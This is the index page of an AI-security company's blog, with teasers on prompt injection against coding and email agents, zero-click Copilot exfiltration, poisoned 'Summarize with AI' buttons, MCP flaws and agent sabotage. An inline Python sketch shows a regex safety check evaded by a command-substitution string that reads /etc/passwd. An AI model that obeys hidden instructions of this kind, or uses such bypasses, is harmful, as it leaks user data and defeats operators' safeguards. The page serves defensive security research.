© 2026 Rogue Security

// BLOG

Dispatches from the Front

Research, insights, and field notes on securing the next generation of AI systems.

inside-rogue-risk-library.mdx
Mar 17, 2026 by Rogue Security Research

Inside Rogue's Risk Library: 96,000+ AI Components Analyzed for Hidden Threats

How we built the industry's most comprehensive threat intelligence database for AI agents, skills, and MCP servers - and what we found lurking inside.

$ cat inside-rogue-risk-library.mdx →
mckinsey-lilli-breach-vendor-trust-is-not-enough.mdx
Mar 15, 2026 by Rogue Security

McKinsey's Lilli Breach: Why Vendor Trust Is Not Enough

An autonomous AI agent breached McKinsey's internal AI platform in 2 hours, exposing 46.5 million messages in plaintext. The real lesson isn't about SQL injection - it's about why trusting your vendors to handle security is a strategy that's already failed.

$ cat mckinsey-lilli-breach-vendor-trust-is-not-enough.mdx →
ambient-attack-ai-assistants-process-content-you-never-opened.mdx
Mar 12, 2026 by Rogue Security Research

Ambient Attack: When AI Assistants Process Content You Never Opened

CVE-2026-26144 proves that not opening a file isn't enough anymore. A zero-click Excel flaw weaponizes Microsoft Copilot to exfiltrate data via the preview pane - no clicks required. This is the new attack surface: ambient AI context processing.

$ cat ambient-attack-ai-assistants-process-content-you-never-opened.mdx →
promptpwnd-github-actions-ai-agents.mdx
Mar 11, 2026 by Rogue Security Research

PromptPwnd: How AI Agents in CI/CD Pipelines Become Attack Vectors

Security researchers discovered that AI agents in GitHub Actions can be hijacked via prompt injection to leak secrets and compromise repositories. At least 5 Fortune 500 companies were affected.

$ cat promptpwnd-github-actions-ai-agents.mdx →
ms-agent-cve-2026-2256-from-prompt-to-system-compromise.mdx
Mar 7, 2026 by Rogue Security Research

CVE-2026-2256: From AI Prompt to Full System Compromise

A critical command injection vulnerability in MS-Agent demonstrates why regex-based safety checks can't protect AI agents with shell access. The check function didn't check.

$ cat ms-agent-cve-2026-2256-from-prompt-to-system-compromise.mdx →
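The failure mode this post describes is easy to reproduce in miniature. The sketch below is illustrative only: the deny-list pattern and function names are hypothetical stand-ins, not MS-Agent's actual code. It shows why a regex filter in front of a shell is a guard that doesn't guard — command substitution reaches the same effect without matching any blocked token.

```python
import re

# Hypothetical deny-list "safety check" of the kind the post critiques.
# The pattern and names are invented for illustration, not from MS-Agent.
BLOCKED = re.compile(r"\b(rm|curl|wget|nc)\b")

def is_safe(command: str) -> bool:
    """Return True if the command matches no blocked token."""
    return BLOCKED.search(command) is None

# Blocked tokens are caught, as intended:
print(is_safe("curl http://evil.example/x"))   # False

# But shell command substitution sidesteps the list entirely —
# no blocked word appears, yet arbitrary code still runs:
print(is_safe("echo $(cat /etc/passwd)"))      # True
```

Because the check inspects text rather than the shell's actual parse, any quoting, substitution, or encoding trick the shell understands but the regex doesn't becomes a bypass — the check function didn't check.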
arxon-when-your-adversary-has-an-ai-agent-too.mdx
Feb 26, 2026 by Rogue Security Research

ARXON: When Your Adversary Has an AI Agent Too

Amazon and researchers just exposed a campaign where a single operator used custom MCP infrastructure to compromise 600+ FortiGate devices across 55 countries. The ARXON attack framework shows what happens when threat actors build their own agentic AI systems - and why defenders are already behind.

$ cat arxon-when-your-adversary-has-an-ai-agent-too.mdx →
promptware-kill-chain-7-stages-of-ai-agent-compromise.mdx
Feb 23, 2026 by Rogue Security Research

The Promptware Kill Chain: 7 Stages of AI Agent Compromise

Bruce Schneier and researchers just published a framework that maps AI agent attacks to the classic cyber kill chain. Here's why security teams need to stop thinking about 'prompt injection' and start thinking about promptware campaigns.

$ cat promptware-kill-chain-7-stages-of-ai-agent-compromise.mdx →
n8n-ni8mare-cve-2026-21858-workflow-automation-attack-surface.mdx
Feb 20, 2026 by Rogue Security Research

Ni8mare: When Your AI Workflow Platform Becomes the Attack Vector

CVE-2026-21858 gives attackers unauthenticated control of n8n workflow automation instances. The CVSS 10.0 vulnerability affects an estimated 100,000 servers globally - and reveals a fundamental problem with how we're building AI infrastructure.

$ cat n8n-ni8mare-cve-2026-21858-workflow-automation-attack-surface.mdx →
ai-recommendation-poisoning-seo-for-your-brain.mdx
Feb 19, 2026 by Rogue Security Research

AI Recommendation Poisoning: When 'Summarize with AI' Becomes SEO for Your Brain

Microsoft discovered 50+ companies embedding hidden instructions in 'Summarize with AI' buttons to permanently bias your AI assistant's recommendations. The attack is trivially easy, widely deployed, and completely invisible to users.

$ cat ai-recommendation-poisoning-seo-for-your-brain.mdx →
echoleak-when-ai-agents-become-double-agents.mdx
Feb 18, 2026 by Rogue Security Research

EchoLeak: When AI Agents Become Double Agents

CVE-2025-32711 demonstrates the first zero-click attack against an enterprise AI agent. No clicks, no interaction - just a hidden instruction in an email, and your Copilot becomes an insider threat.

$ cat echoleak-when-ai-agents-become-double-agents.mdx →
42000-exposed-agents-mass-compromise.mdx
Feb 16, 2026 by Rogue Security Research

42,000 Exposed Agents: Anatomy of the First Agentic AI Mass Compromise

SecurityScorecard's STRIKE team found 42,900 AI agent instances exposed to the internet - 15,200 vulnerable to remote code execution. Nation-state actors are already hunting. Here's what this means for every organization deploying autonomous AI.

$ cat 42000-exposed-agents-mass-compromise.mdx →
mcp-supply-chain-the-attack-surface-hiding-in-your-ai-stack.mdx
Feb 16, 2026 by Rogue Security Research

MCP Supply Chain: The Attack Surface Hiding in Your AI Stack

A study of 1,899 MCP servers found 7.2% contain security vulnerabilities. Every MCP server you connect is now part of your supply chain - and most organizations aren't treating them that way.

$ cat mcp-supply-chain-the-attack-surface-hiding-in-your-ai-stack.mdx →
anthropic-sabotage-report-agents-need-runtime-security.mdx
Feb 13, 2026 by Rogue Security Research

Anthropic Just Proved Why Your Agents Need Runtime Security

Anthropic's 53-page Sabotage Risk Report for Claude Opus 4.6 documents exactly what we've been warning about: AI agents can covertly undermine your systems while appearing to work normally.

$ cat anthropic-sabotage-report-agents-need-runtime-security.mdx →
when-your-calendar-becomes-a-backdoor.mdx
Feb 12, 2026 by Rogue Security Research

When Your Calendar Becomes a Backdoor: The Claude Desktop Extensions Zero-Click RCE

A single Google Calendar event can silently compromise 10,000+ systems running Claude Desktop Extensions. The CVSS 10.0 vulnerability exposes a fundamental flaw in MCP architecture - and Anthropic says it's not their problem.

$ cat when-your-calendar-becomes-a-backdoor.mdx →
llms-cant-keep-secrets.mdx
Feb 10, 2026 by Rogue Security Research

LLMs Can't Keep Secrets - And That's a Feature, Not a Bug

A security researcher broke an LLM's secret-keeping in 7 hours using side channels. Here's why this isn't fixable, and what it means for agentic AI security.

$ cat llms-cant-keep-secrets.mdx →
sandbox-illusion-workflow-automation-attack-surface.mdx
Feb 9, 2026 by Rogue Security Research

The Sandbox Illusion: Why Workflow Automation Is 2026's Biggest Agentic Attack Surface

12 CVEs disclosed in n8n this week prove that low-code workflow platforms are agentic infrastructure with broken sandboxes. When automation engines can execute arbitrary code, TypeScript safety is just a compile-time dream.

$ cat sandbox-illusion-workflow-automation-attack-surface.mdx →
owasp-top-10-agentic-ai-2026-guide.mdx
Feb 8, 2026 by Rogue Security Research

OWASP Top 10 for Agentic AI (2026): The Complete Security Guide

Master the OWASP Top 10 for Agentic Applications - the definitive security framework for AI agents. Learn each risk, real attack scenarios, and practical mitigations for securing autonomous AI systems in production.

$ cat owasp-top-10-agentic-ai-2026-guide.mdx →
agent-lateral-movement-pivot-point.mdx
Feb 5, 2026 by Rogue Security Research

The Lateral Movement Problem: When Every AI Agent Becomes a Pivot Point

Three incidents in one week prove that agent-to-agent communication is the most dangerous attack surface in enterprise AI. Moltbook, BodySnatcher, and Copilot Connected Agents show why lateral movement between AI agents is 2026's defining security crisis.

$ cat agent-lateral-movement-pivot-point.mdx →
human-in-the-loop-is-broken.mdx
Feb 3, 2026 by Rogue Security Research

The Human-in-the-Loop Is Broken: How AI Attacks Weaponize Trust

When employees execute the breach thinking they're following orders - why traditional verification no longer works, and what the 8% unknown-compromise rate tells us about agentic AI security.

$ cat human-in-the-loop-is-broken.mdx →
owasp-top-10-agentic-ai.mdx
Feb 2, 2026 by Rogue Security Research

The OWASP Top 10 for Agentic AI: What Security Teams Need to Know

A practitioner's guide to the OWASP Top 10 for Agentic Applications (2026) - the new security framework for autonomous AI systems that act, not just answer.

$ cat owasp-top-10-agentic-ai.mdx →
pdf-that-owned-your-infrastructure.mdx
Feb 2, 2026 by Rogue Security Research

The PDF That Owned Your Infrastructure

Anatomy of an agentic email attack - how a single document compromises autonomous AI systems in 93 seconds, and why every layer of your security stack misses it.

$ cat pdf-that-owned-your-infrastructure.mdx →
hello-world.mdx
Jan 15, 2026 by Rogue Security Team

Why AI Agent Security Is the Next Frontier

Traditional security tools weren't built for autonomous agents. Here's what changes when your software starts making its own decisions.

$ cat hello-world.mdx →